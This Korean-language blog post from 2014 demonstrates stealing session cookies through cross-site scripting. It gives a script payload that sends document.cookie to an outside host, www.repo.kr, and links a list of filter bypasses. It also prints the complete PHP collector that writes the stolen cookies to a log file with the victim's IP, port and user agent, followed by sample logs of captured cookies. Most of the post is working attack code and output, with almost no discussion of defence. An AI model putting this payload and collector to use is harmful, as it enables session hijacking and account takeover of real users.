Stealing cookie with Cross-site Scripting (XSS)

8/05/2014 0 Comments

많은 Web Application/Service는 User Authentication 후 할당되는 Cookie 혹은 Session을 이용해서 Authentication Token을 유지합니다.

Cross-Site Scripting(XSS) 취약성을 이용해서 공격자는 Target의 Browser상에서 Javascript를 실행할 수 있는데,  보통 User의 Session token을 훔치거나,  Malicious code 삽입된 Web page로 Redirection하는데 사용합니다.

일반적으로 Web Application/Service에 대한 XSS 취약성은 아래와같이 단순한 스크립트의 실행여부로 확인합니다.
<script>alert("test")</script>

Script Filter는 여러가지 방법으로 우회가 가능합니다 :) (Bypass XSS Filter http://pastebin.com/mQDbu7Sm )

Target의 Session token을 훔치기위해서, 아래처럼 공격자의 Web page로 Redirection하는  Script code를 작성할 수 있습니다.
<script>document.location="http://www.repo.kr/stealcookie/loggingCookie.php?cookie=" + document.cookie;</script>

loggingCookie.php는 Cookie를 인자로 받고, Cookie를 포함한 IP/Port/Agent 등을 파일에 기록합니다. loggingCookie.php 코드는 아래와 같습니다.
<?php 

function GetIP() 
{ 
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) 
        $ip = getenv("HTTP_CLIENT_IP"); 
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) 
        $ip = getenv("HTTP_X_FORWARDED_FOR"); 
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) 
        $ip = getenv("REMOTE_ADDR"); 
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) 
        $ip = $_SERVER['REMOTE_ADDR']; 
    else 
        $ip = "unknown"; 
    return($ip); 
} 

function logData() 
{ 
    $ipLog="log.txt"; 
    $cookie = $_SERVER['QUERY_STRING']; 
    $register_globals = (bool) ini_get('register_gobals'); 
    if ($register_globals) $ip = getenv('REMOTE_ADDR'); 
    else $ip = GetIP(); 

    $rem_port = $_SERVER['REMOTE_PORT']; 
    $user_agent = $_SERVER['HTTP_USER_AGENT']; 
    $rqst_method = $_SERVER['METHOD']; 
    $rem_host = $_SERVER['REMOTE_HOST']; 
    $referer = $_SERVER['HTTP_REFERER']; 
    $date=date ("l dS of F Y h:i:s A"); 
    $log=fopen("$ipLog", "a+"); 

    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) 
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>"); 
    else 
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n"); 
    fclose($log); 
} 

logData(); 

?>

파일에 기록되는 데이터는 아래와 같습니다.

IP: 192.168.0.1 | PORT: 52352 | HOST:  |  Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4 | METHOD:  | REF:  |  DATE: Tuesday 19th 2014f August 2014 11:54:44 PM | COOKIE: d62493759118381809d2a30a929fc8bcf1462386675   

IP: 192.168.0.1 | PORT: 54495 | HOST:  |  Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4 | METHOD:  | REF:  |  DATE: Wednesday 20th 2014f August 2014 12:07:19 AM | COOKIE: d62493759118381809d2a30a929fc8bcf1462386675   

IP: 39.7.56.20 | PORT: 22813 | HOST:  |  Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53 | METHOD:  | REF:  |  DATE: Wednesday 20th 2014f August 2014 12:08:27 AM | COOKIE: a918279823420938f09283a09720dd09dc0a0901912

IP: 192.168.0.1 | PORT: 59350 | HOST:  |  Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4 | METHOD:  | REF:  |  DATE: Wednesday 20th 2014f August 2014 12:38:11 AM | COOKIE: d62493759118381809d2a30a929fc8bcf1462386675   

IP: 192.168.0.1 | PORT: 60023 | HOST:  |  Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4 | METHOD:  | REF:  |  DATE: Wednesday 20th 2014f August 2014 12:41:23 AM | COOKIE: d62493759118381809d2a30a929fc8bcf1462386675   

IP: 192.168.0.1 | PORT: 60023 | HOST:  |  Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4 | METHOD:  | REF:  |  DATE: Wednesday 20th 2014f August 2014 12:41:23 AM | COOKIE: d62493759118381809d2a30a929fc8bcf1462386675   

IP: 192.168.0.1 | PORT: 60023 | HOST:  |  Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4 | METHOD:  | REF:  |  DATE: Wednesday 20th 2014f August 2014 12:41:24 AM | COOKIE: d62493759118381809d2a30a929fc8bcf1462386675   

IP: 192.168.0.1 | PORT: 60025 | HOST:  |  Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4 | METHOD:  | REF:  |  DATE: Wednesday 20th 2014f August 2014 12:41:24 AM | COOKIE: d62493759118381809d2a30a929fc8bcf1462386675


If you need my help, tell me anytime. Facebook